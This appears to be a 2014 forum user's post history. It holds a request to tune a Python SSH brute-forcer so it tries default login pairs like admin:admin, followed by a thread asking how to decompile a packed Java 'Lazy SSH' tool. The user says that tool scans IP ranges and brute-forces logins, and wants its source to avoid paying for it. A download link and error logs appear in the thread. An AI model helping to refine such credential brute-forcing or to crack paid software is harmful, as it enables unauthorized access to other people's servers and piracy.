        logging.disable(logging.CRITICAL)
        main()
    except KeyboardInterrupt:
        print '\nbye bye!!!'
        time.sleep(0.2)
        os._exit(1)

The problem with the code is that it loops over ALL users with ALL passwords from the text file; I just need to check some login pairs, e.g. admin:admin, test:test, so it can help to reduce the checking time.
Since I'm very new to Python, I hope someone can help me make this improvement.
Thank you very much for visiting my post. I send you my best regards and look forward to hearing from you guys :)


6
Reverse Engineering / Re: [question] Java decompiler for exe
« on: April 27, 2014, 07:16:56 PM »
In fact, there is no output file. The previous version of the software was written in C#, if this information is helpful.

7
Reverse Engineering / Re: [question] Java decompiler for exe
« on: April 26, 2014, 05:37:33 PM »
I followed the steps of the instructions exactly, many times, but nothing happens. I don't know why the exe file can't be executed from the command line. It can only be executed by double-clicking.

8
Reverse Engineering / Re: [question] Java decompiler for exe
« on: April 26, 2014, 08:06:14 AM »
Code:
set old_opts=%JAVA_TOOL_OPTIONS%
set JAVA_TOOL_OPTIONS=-javaagent:e2j-agent.jar(=output-file)
I really don't know what they mean by the 3rd instruction "C:\dev\e2j>packed-exe
  ...
  C:\dev\e2j>set JAVA_TOOL_OPTIONS=%old_opts%"
And when trying to run it directly I had this error

Code:
C:\Documents and Settings\Administrator\My Documents\Downloads\e2j-master\e2j-master>java e2j-agent.jar
Picked up JAVA_TOOL_OPTIONS: %JAVA_TOOL_OPTIONS%
Unrecognized option: %JAVA_TOOL_OPTIONS%
Error: Could not create the Java Virtual Machine.
Error: A fatal exception has occurred. Program will exit.

I'm sorry for my poor Java skills. I really appreciate your effort to help me.

9
Reverse Engineering / Re: [question] Java decompiler for exe
« on: April 25, 2014, 07:01:14 AM »
Thank you for moving it to the right place, Architect. At first I was confused because it is written in Java, so that's why I posted the topic in that place.
But I found a possible solution. Looks like someone wrote a program to unpack protected jar2exe files: https://github.com/slavemaster/e2j

The usage of e2j is really messy and I can't handle it. I tried to follow the steps but haven't had any luck yet.

10
Reverse Engineering / Re: [question] Java decompiler for exe
« on: April 24, 2014, 04:50:39 AM »
Thank you for your reply,
I tried the updated version and it went smoothly, and I got the same result as yours.
Following your suggestion I renamed it to .zip and extracted it, but the .class files are only 7kB while the original file is 1MB.
Using DJ Java Decompiler I could extract the source, but it seems it is not so helpful in this case.

I am still confused about this step of your suggestion: "try to cut the jar at the offsets specified and try to extract after"
I tried the -d option to extract the dump file, but to be honest I don't know what the next step is with this.
Since Java is new to me, I'm sorry for any trouble and would really appreciate your next response :)

11
Reverse Engineering / Re: [question] Java decompiler for exe
« on: April 22, 2014, 02:55:45 AM »
Thank you very much for your response. I did it with no luck. Hope to see other solutions for this case. Cheers :)

Code:
C:\Users\buda\Downloads\jwscan>java -jar jwscan.jar SSH.exe

____ _  _ _ _    ___  ____ _  _ ____           _ _ _ _ ____ ____ ____ _  _
|___ |  | | |      /  |  | |\ | |___    __     | | | | [__  |    |__| |\ |
|___  \/  | |___  /__ |__| | \| |___          _| |_|_| ___] |___ |  | | \|
                             by Deque

scanning file ...

file name: SSH.exe

Exception in thread "main" java.lang.IllegalArgumentException: MALFORMED
        at java.util.zip.ZipCoder.toString(Unknown Source)
        at java.util.zip.ZipCoder.toStringUTF8(Unknown Source)
        at java.util.zip.ZipInputStream.readLOC(Unknown Source)
        at java.util.zip.ZipInputStream.getNextEntry(Unknown Source)
        at com.github.katjahahn.tools.Jar2ExeScanner.readZipEntriesAt(Jar2ExeScanner.scala:47)
        at com.github.katjahahn.tools.Jar2ExeScanner$$anonfun$getZipAddresses$1.apply$mcZJ$sp(Jar2ExeScanner.scala:104)
        at com.github.katjahahn.tools.Jar2ExeScanner$$anonfun$getZipAddresses$1.apply(Jar2ExeScanner.scala:102)
        at com.github.katjahahn.tools.Jar2ExeScanner$$anonfun$getZipAddresses$1.apply(Jar2ExeScanner.scala:102)
        at scala.collection.TraversableLike$$anonfun$filter$1.apply(TraversableLike.scala:264)
        at scala.collection.immutable.List.foreach(List.scala:318)
        at scala.collection.TraversableLike$class.filter(TraversableLike.scala:263)
        at scala.collection.AbstractTraversable.filter(Traversable.scala:105)
        at com.github.katjahahn.tools.Jar2ExeScanner.getZipAddresses(Jar2ExeScanner.scala:102)
        at com.github.katjahahn.tools.Jar2ExeScanner.createReport(Jar2ExeScanner.scala:78)
        at com.github.katjahahn.tools.Jar2ExeScanner$.invokeCLI(Jar2ExeScanner.scala:192)
        at com.github.katjahahn.tools.Jar2ExeScanner$.main(Jar2ExeScanner.scala:173)
        at com.github.katjahahn.tools.Jar2ExeScanner.main(Jar2ExeScanner.scala)

12
Reverse Engineering / [question] Java decompiler for exe
« on: April 21, 2014, 05:33:22 AM »
Dear all,
I found a great piece of software to scan SSH socks. The software scans an IP range to get the IPs that support SSH, and after that it brute-forces simple logins from a txt file.
The question is: since it is an exe file but uses Java, I want to ask if there is a way to extract and decompile it into source.
They sell the software at a silly price so I really need to decompile it.
Thank you very much for your attention to my topic.
Here is the software:
Code:
https://www.dropbox.com/s/570tet3lfp0e1f3/Lazy%20SSH%201.6.6.rar
Requirements
- Java: https://www.java.com/en/download/
- Microsoft Visual C++ 2010: http://www.microsoft.com/en-us/download/details.aspx?id=5555
